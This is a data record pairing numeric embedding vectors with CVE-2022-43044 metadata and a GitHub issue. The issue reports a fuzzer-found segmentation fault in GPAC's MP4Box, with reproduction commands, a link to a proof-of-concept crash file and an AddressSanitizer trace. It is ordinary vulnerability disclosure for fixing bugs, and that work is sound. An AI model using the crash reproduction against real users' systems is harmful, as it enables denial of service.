0.008085141889750957, 0.0017755745211616158, 0.0018096512649208307, 0.024162162095308304, -0.0016231262125074863, 0.015955062583088875, -0.007461000233888626, 0.004024635534733534, 0.00816405564546585, 0.002283137757331133, -0.011901729740202427, -0.007755135651677847, 0.00832905899733305, -0.004910629242658615, 0.043732937425374985, 0.005613685119897127, 0.010115394368767738, -0.017820311710238457, -0.01830814592540264, -0.0015953268157318234, -0.004828128032386303, 0.0031117391772568226, -0.0014913033228367567, 0.005965213291347027, -0.006047714501619339, 0.008608845993876457, 0.0010895570740103722, 0.006359785329550505, 0.011643464677035809, -0.0008250144310295582, -0.0024230314884334803, -0.02241169661283493, -0.013135665096342564, -0.000484247604617849, 0.026558291167020798, -0.019771650433540344, 0.013020879589021206, 0.01615593582391739, -0.010775405913591385, -0.0027512437663972378, 0.00677229231223464, 0.01823640614748001, 0.004293662030249834, -0.04281466081738472, 0.04066245257854462, 0.009161246940493584, 0.03285709768533707, -0.01945599354803562, 0.005376941990107298, 0.001320919836871326, 0.009354946203529835, 0.005861189682036638, -0.010050827637314796, 0.009921695105731487, -0.00743947783485055, 0.012073907069861889, 0.005660316441208124, -0.014635038562119007, -0.022311260923743248, 0.03974417224526405, 0.006008257158100605, 0.00033897333196364343, 0.03670237958431244, 0.003486582776531577, -0.014168726280331612, -0.013444148004055023, -0.025769146159291267, 0.004537579603493214, 0.00800622720271349, -0.009383642114698887, -0.0010671382769942284, -0.002130689565092325, -0.004125072155147791, -0.010115394368767738, 0.002580860396847129, -0.012999357655644417, -0.0016563062090426683, -0.002202429808676243, -0.008594498038291931, 0.008630368858575821, 0.014950696378946304, 0.008393624797463417, -0.016428548842668533, 0.03627194091677666, 0.003656966146081686, -0.011686508543789387, 0.007568610832095146, -0.0061840214766561985, 0.0022508546244353056, 0.0019136747578158975, 0.010014957748353481, 0.0021773206535726786, -0.006585767492651939, -0.0021719401702284813, 0.011392373591661453, -0.0017692972905933857, 0.025482185184955597, -0.006227065343409777, 0.017619438469409943, 0.00017856630438473076, -0.003920611925423145, 0.010926060378551483, -0.009311902336776257, 0.0170455165207386, -0.005968800280243158, 0.005897059570997953, 0.011098237708210945, 0.025783494114875793, -0.013028054498136044, 0.006861967965960503, -0.003407668322324753, 0.009448208846151829, 0.010818449780344963, 0.006273696664720774, -0.007726439740508795, -0.0006774982903152704, -0.009197117760777473, 0.016528984531760216, 0.0010312680387869477, 0.02266996167600155, -0.005685425363481045, -0.009096681140363216, 0.005122263450175524, 0.014147204346954823, 0.009111029095947742, 0.025769146159291267, 0.011428243480622768, -0.010136916302144527, -0.00241047702729702, 0.008637542836368084, -0.020489053800702095, -0.02911224775016308, 0.0073175192810595036, 0.012116950936615467, -0.003317992901429534, -0.01335088536143303, 0.02004426345229149, -0.009519949555397034, 0.008443843573331833, 0.022784747183322906, -0.0038560456596314907, -0.008852764032781124, 0.003960069268941879, 0.0290692038834095, 0.0025431967806071043, -0.02353084646165371, 0.005430747289210558, 0.013530236668884754, -0.021493420004844666, 0.011069541797041893, 0.010301919654011726, 0.01052431482821703, -0.0015702176606282592, 0.02450651489198208, -0.020919496193528175, 0.03997374325990677, 0.0010034686420112848, -0.015711143612861633, -0.01957077719271183, 0.0212638508528471, -0.013953505083918571, -0.030877061188220978, 0.01291326992213726, -0.015151569619774818, 0.005879124626517296, 0.011715205386281013, 0.019728606566786766, -0.0001512152812210843, -0.01780596375465393, 0.028724851086735725, -0.005254983436316252, 0.006474569905549288, 0.0036802818067371845, 0.028409192338585854, 0.027634397149086, 0.019398599863052368, -0.001252766465768218, -0.0047994316555559635, 0.007174038793891668, -0.011435417458415031, 0.030561404302716255, 0.020589491352438927, 0.007791006006300449, -0.035669319331645966, 0.00645663496106863, -0.01368806604295969, -0.011184326373040676, 0.00430800998583436, 0.015567664057016373, 0.010832798667252064, 0.010215830989181995, -0.007590132765471935, 0.01183716394007206, 0.01572549343109131, -0.006435112562030554, 0.016844643279910088, -0.021091673523187637, -0.0008819583454169333, 0.025338703766465187, 0.00352065940387547, -0.014527427963912487, -0.02734743431210518, -0.00529802730306983, -0.008716456592082977, 0.008228622376918793, -0.003730500116944313, 0.017461609095335007, 0.0011361883953213692, -0.0005972387152723968, -0.006485330872237682, 0.0016760347643867135, 0.009584515355527401, 0.03133619949221611, 0.004573449492454529, 0.00530520174652338, -0.01061040349304676, 0.007145342417061329, -0.0009178285836242139 ]
CVE-2022-43044
2022-10-19T14:15:10.317000
GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function gf_isom_get_meta_item_info at /isomedia/meta.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2282" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2282
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
### Description SEGV in isomedia/meta.c:177 in gf_isom_get_meta_item_info ### Version ``` $ ./MP4Box -version MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ### Replay ``` git clone https://github.com/gpac/gpac.git cd gpac ./configure --enable-sanitizer make -j$(nproc) ./bin/gcc/MP4Box -info mp4box-info-segv-1 ``` ### POC https://github.com/17ssDP/fuzzer_crashes/blob/main/gpac/mp4box-info-segv-1 ### ASAN ``` [iso file] Unknown box type i000000 in parent iinf [iso file] Unknown top-level box type v000000 [iso file] Incomplete box v000000 - start 308 size 191662031 [iso file] Incomplete file while reading for dump - aborting parsing # File Meta type: "Meta" - 3 resource item(s) ASAN:DEADLYSIGNAL ================================================================= ==52314==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000028 (pc 0x7f4d67b428f9 bp 0x000000000000 sp 0x7ffcd749c3c0 T0) ==52314==The signal is caused by a READ memory access. ==52314==Hint: address points to the zero page. #0 0x7f4d67b428f8 in gf_isom_get_meta_item_info isomedia/meta.c:177 #1 0x55fa2660a89e in DumpMetaItem /gpac/applications/mp4box/filedump.c:2467 #2 0x55fa26642cc8 in DumpMovieInfo /gpac/applications/mp4box/filedump.c:3820 #3 0x55fa265efee4 in mp4box_main /gpac/applications/mp4box/mp4box.c:6359 #4 0x7f4d669cfc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #5 0x55fa265c00a9 in _start (/gpac/bin/gcc/MP4Box+0x4e0a9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/meta.c:177 in gf_isom_get_meta_item_info ==52314==ABORTING ``` ### Environment ``` Ubuntu 16.04 Clang 10.0.1 gcc 5.5 ```
SEGV isomedia/meta.c:177 in gf_isom_get_meta_item_info
https://api.github.com/repos/gpac/gpac/issues/2282/comments
0
2022-10-09T08:38:17
2022-10-10T15:44:29Z
https://github.com/gpac/gpac/issues/2282
1,402,200,347
2,282
true
This is a GitHub Issue repo:gpac owner:gpac Title : SEGV isomedia/meta.c:177 in gf_isom_get_meta_item_info Issue date: --- start body --- ### Description SEGV in isomedia/meta.c:177 in gf_isom_get_meta_item_info ### Version ``` $ ./MP4Box -version MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ### Replay ``` git clone https://github.com/gpac/gpac.git cd gpac ./configure --enable-sanitizer make -j$(nproc) ./bin/gcc/MP4Box -info mp4box-info-segv-1 ``` ### POC https://github.com/17ssDP/fuzzer_crashes/blob/main/gpac/mp4box-info-segv-1 ### ASAN ``` [iso file] Unknown box type i000000 in parent iinf [iso file] Unknown top-level box type v000000 [iso file] Incomplete box v000000 - start 308 size 191662031 [iso file] Incomplete file while reading for dump - aborting parsing # File Meta type: "Meta" - 3 resource item(s) ASAN:DEADLYSIGNAL ================================================================= ==52314==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000028 (pc 0x7f4d67b428f9 bp 0x000000000000 sp 0x7ffcd749c3c0 T0) ==52314==The signal is caused by a READ memory access. ==52314==Hint: address points to the zero page. #0 0x7f4d67b428f8 in gf_isom_get_meta_item_info isomedia/meta.c:177 #1 0x55fa2660a89e in DumpMetaItem /gpac/applications/mp4box/filedump.c:2467 #2 0x55fa26642cc8 in DumpMovieInfo /gpac/applications/mp4box/filedump.c:3820 #3 0x55fa265efee4 in mp4box_main /gpac/applications/mp4box/mp4box.c:6359 #4 0x7f4d669cfc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #5 0x55fa265c00a9 in _start (/gpac/bin/gcc/MP4Box+0x4e0a9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/meta.c:177 in gf_isom_get_meta_item_info ==52314==ABORTING ``` ### Environment ``` Ubuntu 16.04 Clang 10.0.1 gcc 5.5 ``` --- end body ---
2,334
[ -0.04151085019111633, 0.03825791925191879, -0.008261867798864841, -0.0011002030223608017, -0.005886940751224756, -0.0016372604295611382, -0.04211537539958954, 0.045915260910987854, -0.012457572855055332, 0.007142773829400539, -0.03264445438981056, 0.009240626357495785, 0.02934834361076355, -0.012471966445446014, 0.04188508167862892, 0.02193569205701351, -0.01097504235804081, 0.033421702682971954, -0.017459314316511154, -0.012220080010592937, 0.042547181248664856, -0.02599465847015381, -0.001609373022802174, 0.04985908046364784, -0.027074171230196953, 0.005206848029047251, -0.015616945922374725, 0.018394891172647476, -0.003290713531896472, 0.03532164543867111, -0.0059876954182982445, 0.003983400762081146, -0.0023893206380307674, 0.01889866404235363, 0.051154494285583496, 0.00898154266178608, 0.05607707053422928, 0.06759186834096909, -0.013234822079539299, 0.017819151282310486, 0.013609052635729313, -0.04844851419329643, -0.028801390901207924, 0.02808171510696411, -0.00515647092834115, 0.027131743729114532, 0.00816111359745264, -0.022007659077644348, -0.043180495500564575, -0.010507253929972649, 0.021302377805113792, -0.004818223416805267, -0.01427835039794445, -0.053687747567892075, 0.005512709729373455, -0.0535438135266304, 0.026757514104247093, 0.009175855666399002, -0.007229134440422058, 0.024843178689479828, -0.011154960840940475, 0.005671038292348385, -0.025159835815429688, 0.008283458650112152, 0.011176551692187786, 0.015357863157987595, 0.004559140652418137, 0.00016215175855904818, -0.029736967757344246, 0.0356958769261837, 0.006840510293841362, -0.04856366291642189, 0.026627972722053528, 0.0013808762887492776, 0.02278490737080574, -0.029002899304032326, 0.03537921980023384, 0.022007659077644348, -0.02956424653530121, -0.0008600115543231368, -0.06759186834096909, 0.037509456276893616, -0.010809517465531826, 0.0267719067633152, 0.009075100533664227, -0.012738246470689774, -0.01796308532357216, -0.08440347760915756, -0.02210841327905655, -0.026440856978297234, 0.009773185476660728, -0.0018711547600105405, 0.013767381198704243, 0.013083689846098423, 0.0037962852511554956, 0.004361229948699474, -0.005440742243081331, -0.012457572855055332, -0.03753824532032013, -0.01473174523562193, -0.034947413951158524, -0.06062541529536247, 0.01689796708524227, -0.02205083891749382, 0.003958212211728096, 0.020870571956038475, 0.022928843274712563, -0.0341125912964344, 0.008413000032305717, 0.13725639879703522, 0.022281136363744736, 0.01317724771797657, 0.004926174879074097, 0.007765292190015316, 0.01937364973127842, 0.02883017808198929, -0.019992569461464882, -0.021345557644963264, -0.029477884992957115, -0.03347927704453468, -0.02046755515038967, -0.04096389561891556, -0.025015899911522865, 0.025922691449522972, -0.031262677162885666, 0.05999210104346275, -0.012032964266836643, 0.012975739315152168, -0.010759140364825726, -0.013162854127585888, -0.05348623916506767, -0.01632222719490528, 0.009600463323295116, -0.02058270201086998, 0.0031053973361849785, -0.015933603048324585, -0.044389549642801285, 0.03486105427145958, 0.021748576313257217, 0.00889518205076456, -0.06327381730079651, -0.045541029423475266, 0.026181774213910103, -0.010370515286922455, -0.014551826752722263, -0.007110388018190861, -0.00916146207600832, 0.023173533380031586, -0.022770514711737633, -0.021662214770913124, -0.00019453713321126997, -0.00950690545141697, 0.01244317926466465, -0.006361926440149546, 0.05953150987625122, 0.041395701467990875, 0.03166569769382477, 0.018625186756253242, -0.014508645981550217, -0.022871268913149834, 0.0035066159907728434, -0.020827392116189003, 0.006034474354237318, -0.021777363494038582, -0.01689796708524227, -0.025965871289372444, 0.028887750580906868, 0.007319094147533178, 0.011406847275793552, 0.027477188035845757, -0.004102147184312344, -0.00009192722791340202, 0.03440046310424805, 0.030283920466899872, -0.034573182463645935, -0.011313289403915405, 0.042662329971790314, 0.034314099699258804, -0.035782236605882645, 0.016840392723679543, -0.0026663956232368946, 0.02078421227633953, -0.004461984615772963, -0.007214741315692663, 0.006599418818950653, -0.011241322383284569, 0.0116011593490839, -0.04876517131924629, 0.03359442576766014, -0.020553916692733765, 0.011421240866184235, -0.001028235536068678, 0.002535054925829172, -0.013105280697345734, 0.04761369153857231, 0.003015437861904502, -0.02776505798101425, -0.03486105427145958, -0.01937364973127842, -0.0004970254958607256, 0.001639959285967052, -0.0151707474142313, 0.006228786427527666, -0.0036829363089054823, -0.0036055713426321745, -0.010003481060266495, -0.013357166200876236, 0.04038815572857857, -0.00900313351303339, -0.021230410784482956, -0.01157237309962511, -0.04010028764605522, 0.01722901687026024, -0.00034454435808584094, 0.010377712547779083, 0.0023425419349223375, -0.013788971118628979, 0.010169006884098053, 0.005527103319764137, 0.02236749604344368, 0.035983745008707047, 0.002331746742129326, 0.00552350515499711, -0.008492164313793182, -0.02897411212325096, -0.01606314443051815, 0.01931607536971569, -0.001200957573018968, -0.02346140332520008, 0.013364363461732864, 0.0315217599272728, 0.00785165373235941, 0.0007592570618726313, 0.004897387698292732, 0.008355425670742989, 0.01763203553855419, -0.005771792959421873, 0.005375971551984549, 0.0023911199532449245, 0.026268133893609047, -0.002259779255837202, 0.028225651010870934, -0.03581102564930916, -0.021662214770913124, 0.017128262668848038, 0.05907091870903969, -0.03347927704453468, -0.007002437021583319, -0.019805453717708588, 0.029074866324663162, 0.0102625647559762, -0.01768960990011692, 0.0075206030160188675, 0.0030496225226670504, 0.00430725421756506, -0.004163319244980812, 0.01990620791912079, 0.01947440393269062, -0.007736505474895239, -0.019978174939751625, 0.018078234046697617, 0.00008973446529125795, -0.01732977293431759, 0.0005357080372050405, 0.012018571607768536, -0.02956424653530121, -0.0035390013363212347, 0.0115004051476717, -0.004850608762353659, -0.02169100195169449, 0.00645908247679472, -0.024166684597730637, -0.04338200390338898, -0.03108995594084263, -0.016941146925091743, 0.005437144078314304, 0.015401042997837067, 0.01396169327199459, 0.023504583165049553, 0.0069016823545098305, -0.010672778822481632, 0.009665234014391899, -0.010514450259506702, 0.026800693944096565, 0.027808239683508873, 0.0038142770063132048, 0.016869179904460907, -0.01673963852226734, -0.019402435049414635, 0.011003829538822174, 0.02137434482574463, 0.025706788524985313, -0.07173720002174377, 0.026340102776885033, 0.028902145102620125, 0.020539522171020508, 0.0011514798970893025, 0.016941146925091743, 0.0008600115543231368, 0.019301680848002434, -0.013580265454947948, -0.002959663048386574, 0.00937016773968935, -0.00806035939604044, -0.023447008803486824, 0.030427856370806694, -0.039668481796979904, 0.007909227162599564, -0.005516308359801769, -0.009377364069223404, 0.012479162774980068, -0.03347927704453468, -0.0301399864256382, 0.00023276986030396074, -0.0038250721991062164, -0.0038538591470569372, -0.019128959625959396, -0.01984863355755806, -0.010730353184044361, 0.004217294976115227, -0.010046661831438541, 0.004120138939470053, -0.015933603048324585, 0.006379918195307255, 0.015876028686761856, -0.012522343546152115, -0.030053624883294106, 0.0084777707234025, -0.07478861510753632, 0.014580613933503628, 0.011716308072209358, -0.0116011593490839, 0.019805453717708588, -0.017675215378403664, 0.019143352285027504, -0.018193382769823074, -0.030283920466899872, 0.00921183917671442, 0.014580613933503628, -0.012378408573567867, -0.003186360700055957, 0.03097480908036232, 0.016250260174274445, 0.005937318317592144, -0.024267438799142838, -0.0060740564949810505, 0.00931979063898325, 0.01217689923942089, 0.003467033850029111, 0.007506209425628185, 0.0008721560589037836, 0.025159835815429688, 0.011536388657987118, 0.022928843274712563, 0.0031791639048606157, -0.013083689846098423, -0.006707370281219482, -0.031003596261143684, 0.02209402061998844, -0.006002089008688927, 0.008578524924814701, -0.045022863894701004, 0.0032997094094753265, 0.01794869266450405, -0.0013179046800360084, 0.019963782280683517, -0.00206186855211854, -0.0037207193672657013, -0.0034634354524314404, -0.02357655018568039, -0.021806150674819946, 0.03460197150707245, -0.04398653283715248, 0.012169702909886837, -0.005480324383825064, -0.010528843849897385, 0.017991872504353523, 0.013191641308367252, -0.026224954053759575, 0.010478466749191284, -0.039035167545080185, 0.020553916692733765, 0.008780034258961678, -0.050693903118371964, 0.029305163770914078, 0.04038815572857857, -0.01899941824376583, 0.05838003009557724, -0.037250373512506485, -0.023691698908805847, -0.0460016205906868, 0.03753824532032013, -0.030744513496756554, -0.06868577748537064, -0.0008069354807958007, 0.007232733070850372, -0.02042437344789505, -0.009830759838223457, 0.03241415694355965, -0.020122110843658447, 0.04251839593052864, 0.00037805424653925, -0.001242338796146214, 0.022223562002182007, -0.009017527103424072, 0.023806845769286156, 0.006998838856816292, -0.014494253322482109, 0.03618525341153145, 0.004300057888031006, 0.03532164543867111, -0.01842367835342884, -0.002522460650652647, 0.008448983542621136, 0.017459314316511154, 0.009305397048592567, -0.00368833402171731, 0.017459314316511154, -0.05391804501414299, 0.03802762180566788, -0.019546370953321457, -0.012853394262492657, 0.0010336331324651837, 0.005559488665312529, 0.0517590194940567, 0.04271990433335304, -0.01627904735505581, 0.01349390484392643, 0.01827974244952202, -0.03229901194572449, 0.006912477780133486, -0.014343121089041233, -0.007024027407169342, 0.0038178754039108753, 0.019301680848002434, -0.02762112393975258, -0.0464046373963356, -0.04038815572857857, 0.010384908877313137, 0.00590853113681078, -0.045857686549425125, 0.035408005118370056, -0.013551479205489159, 0.004199303220957518, 0.027577942237257957, -0.05288171395659447, -0.03224143758416176, -0.007477422244846821, 0.01522832177579403, 0.005203249864280224, -0.009168658405542374, 0.027016596868634224, 0.00879442784935236, -0.0076069640927016735, 0.011946603655815125, 0.010852698236703873, 0.004591525997966528, 0.011140568181872368, 0.0354943685233593, 0.03296111151576042, 0.00575020257383585, 0.01102541945874691, 0.012061751447618008, 0.007045617327094078, 0.025577247142791748, 0.00919024832546711, -0.007542193401604891, -0.019402435049414635, 0.008506557904183865, -0.01721462421119213, 0.014983631670475006, 0.025274982675909996, 0.019546370953321457, -0.004206500016152859, -0.008132326416671276, 0.016998721286654472, 0.0016048750840127468, -0.002614219207316637, -0.009039117023348808, -0.049743931740522385, 0.009866743348538876, -0.015588158741593361, -0.013472314924001694, 0.016768425703048706, 0.007441438734531403, 0.0011973591754212976, -0.027520369738340378, -0.009658037684857845, 0.004458385985344648, 0.009233429096639156, 0.010298548266291618, 0.02415229007601738, -0.029593033716082573, -0.026815088465809822, 0.03129146620631218, 0.002894892357289791, -0.024425767362117767, -0.002626813482493162, 0.030312707647681236, 0.022439464926719666, 0.010392106138169765, -0.025663606822490692, 0.007527799811214209, 0.009118281304836273, 0.036041319370269775, -0.029477884992957115, -0.02461288310587406, 0.03442924842238426, -0.008081949315965176, -0.01832292415201664, -0.029880903661251068, -0.02718931809067726, 0.012349621392786503, -0.0446198433637619, -0.0006994340801611543, -0.01858200691640377, 0.011219732463359833, -0.004210098180919886, 0.028326405212283134, 0.01060800813138485, -0.010219383984804153, -0.0006207196274772286, 0.01165873371064663, 0.021547067910432816, 0.015271501615643501, 0.01443667896091938, -0.004775043111294508, -0.000526712101418525, 0.03379593417048454, -0.0035390013363212347, -0.008153917267918587, -0.013659429736435413, -0.029477884992957115, 0.03091723471879959, -0.008420196361839771, 0.00028179772198200226, 0.003632559208199382, 0.01659570448100567, 0.010464073158800602, -0.042230524122714996, -0.02125919796526432, 0.05080904811620712, -0.0085281478241086, -0.006005687173455954, -0.029650606215000153, 0.03713522478938103, -0.014206383377313614, 0.023058384656906128, -0.009816366247832775, -0.019301680848002434, 0.009060706943273544, -0.023389434441924095, -0.0013475912855938077, 0.00519965123385191, 0.005419152323156595, 0.011845849454402924, -0.012378408573567867, 0.017819151282310486, 0.021172836422920227, 0.011493208818137646, 0.017416132614016533, 0.0059121293015778065, -0.014983631670475006, -0.02399396151304245, -0.010564828291535378, -0.008117932826280594, -0.007391061633825302, 0.007142773829400539, -0.040819961577653885, -0.008117932826280594, 0.02272733487188816, 0.01175948791205883, 0.02226674184203148, -0.03471711650490761, -0.0072471266612410545, 0.014659778214991093, 0.0014609401114284992, -0.014659778214991093, -0.01230644155293703, -0.014530236832797527, 0.018394891172647476, -0.04418804123997688, -0.017085082828998566, 0.012263260781764984, -0.0003454439574852586, -0.015732094645500183, 0.0061820074915885925, 0.01653813011944294, -0.011111781001091003, 0.013321182690560818, -0.0023677304852753878, 0.004533952102065086, -0.014256760478019714, -0.024382585659623146, 0.007930818013846874, -0.0068045263178646564, 0.009384561330080032, 0.0032403364311903715, 0.00671816524118185, -0.0013664828147739172, -0.01689796708524227, 0.03894880786538124, -0.018941843882203102, -0.030312707647681236, -0.03526407107710838, 0.030053624883294106, 0.027333253994584084, 0.0020492742769420147, -0.025059081614017487, 0.029146835207939148, 0.0020492742769420147, 0.026757514104247093, 0.048477303236722946, -0.014926058240234852, 0.015026812441647053, -0.0073262909427285194, 0.0341125912964344, -0.007448635529726744, 0.006419500336050987, 0.022453857585787773, 0.012342425063252449, -0.033105045557022095, 0.03771096467971802, -0.021273590624332428, 0.001209053909406066, 0.029909688979387283, -0.006365524604916573, -0.027333253994584084, 0.00001831516419770196, -0.0062575736083090305, -0.03615646809339523, 0.030629364773631096, -0.01396169327199459, -0.061719320714473724, -0.03575345128774643, 0.008607312105596066, 0.03690493106842041, -0.010248171165585518, -0.0010552234016358852, -0.019100172445178032, -0.006858502048999071, 0.00043158006155863404, -0.01701311580836773, -0.004530353471636772, -0.016365407034754753, 0.0020294832065701485, 0.022194774821400642, -0.03296111151576042, -0.007369471248239279, 0.04246082156896591, -0.029074866324663162, -0.024699242785573006, -0.00016754931129980832, 0.014508645981550217, 0.027693090960383415, -0.019992569461464882, 0.03765339031815529, 0.045915260910987854, 0.010931862518191338, -0.011169354431331158, 0.0023119556717574596, -0.047584906220436096, -0.012277654372155666, -0.0059769004583358765, -0.00005003989645047113, -0.014163202606141567, -0.03002483770251274, -0.008916771970689297, -0.001594080007635057, -0.00013505149399861693, 0.013558675535023212, -0.01584724150598049, 0.02383563295006752, -0.013349969871342182, 0.006174810696393251, -0.02016529068350792, -0.010615205392241478, 0.0034094599541276693, -0.010010678321123123, -0.0005554991075769067, 0.0024145094212144613, 0.009326986968517303, 0.009204641915857792, 0.004854207392781973, -0.008967150002717972, 0.003481427440419793, -0.0010822111507877707, -0.00806035939604044, -0.01979106105864048, -0.028758209198713303, 0.0025602434761822224, -0.008751247078180313, 0.015789667144417763, 0.03722158819437027, 0.011334880255162716, -0.03900638222694397, 0.01491166464984417, 0.0012540335301309824, -0.005904932972043753, -0.00898154266178608, -0.017444919794797897, 0.009600463323295116, -0.005422750487923622, -0.025692394003272057, 0.03060057759284973, 0.008571328595280647, -0.01067997608333826, -0.005807776469737291, 0.010852698236703873, -0.008240277878940105, -0.0150699932128191, 0.008096342906355858, -0.03442924842238426, 0.03169448301196098, 0.012817410752177238, -0.01270226202905178, -0.010550434701144695, -0.0068800924345850945, -0.007527799811214209, 0.0268726609647274, 0.0014654380502179265, -0.0074342419393360615, -0.028254438191652298, -0.009031920693814754, 0.007369471248239279, 0.006894485559314489, 0.008341032080352306, 0.008420196361839771, 0.014163202606141567, 0.0073442826978862286, -0.009751595556735992, -0.05558769032359123, 0.010982239618897438, 0.014220776036381721, -0.0010030468693003058, -0.005260823760181665, -0.009823562577366829, -0.0030190362595021725, 0.004267672076821327, 0.028268830850720406, 0.004829018842428923, 0.0010066452668979764, 0.008873592130839825, -0.03532164543867111, -0.0031665696296840906, 0.008117932826280594, 0.01649494841694832, 0.012889377772808075, -0.01853882521390915, 0.006937666330486536, 0.015688912943005562, 0.042345672845840454, 0.015041206032037735, -0.04001392424106598, -0.015386649407446384, -0.02718931809067726, 0.03537921980023384, -0.0206258837133646, 0.0022561808582395315, -0.014810909517109394, 0.022612186148762703, -0.0051312823779881, 0.008312244899570942, 0.01099663320928812, -0.002497271867468953, 0.000822678382974118, -0.0009162361384369433, -0.01396889053285122, 0.019100172445178032, -0.009082297794520855, 0.019100172445178032, -0.0015562970656901598, -0.00785165373235941, 0.007297503761947155, 0.01743052713572979, -0.022381890565156937, -0.0004048171394970268, 0.014371908269822598, 0.007894833572208881, 0.012212883681058884, -0.04816064611077309, 0.01448705606162548, -0.04306534677743912, 0.012738246470689774, 0.008081949315965176, -0.029650606215000153, 0.04562738910317421, -0.01081671379506588, 0.009125477634370327, -0.006570632103830576, 0.000854613957926631, -0.01627904735505581, 0.04807428643107414, -0.018610794097185135, -0.017027508467435837, -0.009147068485617638, -0.002833720063790679, 0.019244108349084854, -0.0026160182897001505, -0.030053624883294106, 0.012479162774980068, 0.020136503502726555, -0.0018153799464926124, -0.027218105271458626, -0.03229901194572449, -0.008290654979646206, -0.031636908650398254, 0.02274172753095627, -0.018553219735622406, 0.0073478808626532555, 0.0029020891524851322, 0.022180380299687386, 0.04211537539958954, -0.012752640061080456, 0.007966801524162292, -0.018409283831715584, 0.011838652193546295, -0.0076069640927016735, -0.008204294368624687, 0.02094254083931446, -0.0008523649885319173, 0.005264421924948692, 0.005178060848265886, -0.04539709538221359, 0.018596399575471878, -0.022900056093931198, 0.005185257643461227, 0.015213928185403347, 0.023015204817056656, 0.013875332660973072, -0.011493208818137646, -0.022756120190024376, -0.03388229385018349, 0.009564479812979698, 0.0033554842229932547, 0.0286574549973011, 0.007398258429020643, 0.012198490090668201, -0.029852116480469704, 0.03837306797504425, -0.03203992918133736, -0.00737666804343462, -0.009981891140341759, -0.006120835430920124, -0.018553219735622406, -0.0376821793615818, -0.0026951825711876154, -0.0021230410784482956, 0.006361926440149546, 0.023029597476124763, 0.013040510006248951, 0.02405153587460518, 0.0005217643338255584, 0.01312687061727047, -0.015660125762224197, 0.01024097390472889, -0.006970051676034927, -0.014321531169116497, 0.03978363052010536, -0.0176464281976223, 0.02623934857547283, 0.01616389863193035, -0.019301680848002434, -0.006282762158662081, -0.003170168027281761, -0.0029452696908265352, -0.01008264534175396, -0.044907715171575546, -0.014954844489693642, -0.02199326641857624, -0.01727219857275486, -0.01606314443051815, 0.0025368540082126856, 0.026210561394691467, -0.02373487874865532, -0.0025044686626642942, 0.007973997853696346, 0.0030208355747163296, 0.0014519441174343228, 0.02645524963736534, -0.0018000869313254952, 0.02315913885831833, -0.011881832964718342, 0.016466163098812103, 0.006120835430920124, -0.031579334288835526, 0.001892745029181242, -0.023921994492411613, -0.03952454775571823, 0.0021572255063802004, -0.008628902025520802, -0.017358558252453804, -0.028988506644964218, -0.018294136971235275, 0.02623934857547283, 0.06079813838005066, 0.003983400762081146, -0.0205251295119524, -0.021921297535300255, -0.0034346485044807196, -0.0007039320189505816, 0.0022939639165997505, 0.017128262668848038, -0.017991872504353523, -0.018078234046697617, -0.003188160015270114, 0.059358786791563034, -0.0021104468032717705, -0.00185676128603518, 0.017444919794797897, 0.02341822162270546, 0.006998838856816292, -0.010564828291535378, -0.031262677162885666, -0.03077329881489277, -0.01732977293431759, -0.041971441358327866, 0.018869876861572266, -0.002790539525449276, 0.08319441974163055, 0.015415436588227749, -0.0024774810299277306, 0.011529192328453064, 0.027275679633021355, 0.0012909169308841228, -0.02110086940228939, -0.032356586307287216, 0.012227277271449566, 0.0002446894650347531, 0.008261867798864841, -0.009154264815151691, -0.020726637914776802, -0.009758791886270046, 0.009039117023348808, 0.016998721286654472, -0.0006319645326584578, -0.011126174591481686, -0.00444759102538228, 0.0016462564235553145, -0.032529305666685104, -0.012292047962546349, 0.03543679416179657, 0.015415436588227749, 0.004066163208335638, -0.006570632103830576, 0.016466163098812103, -0.006836911663413048, -0.033623211085796356, 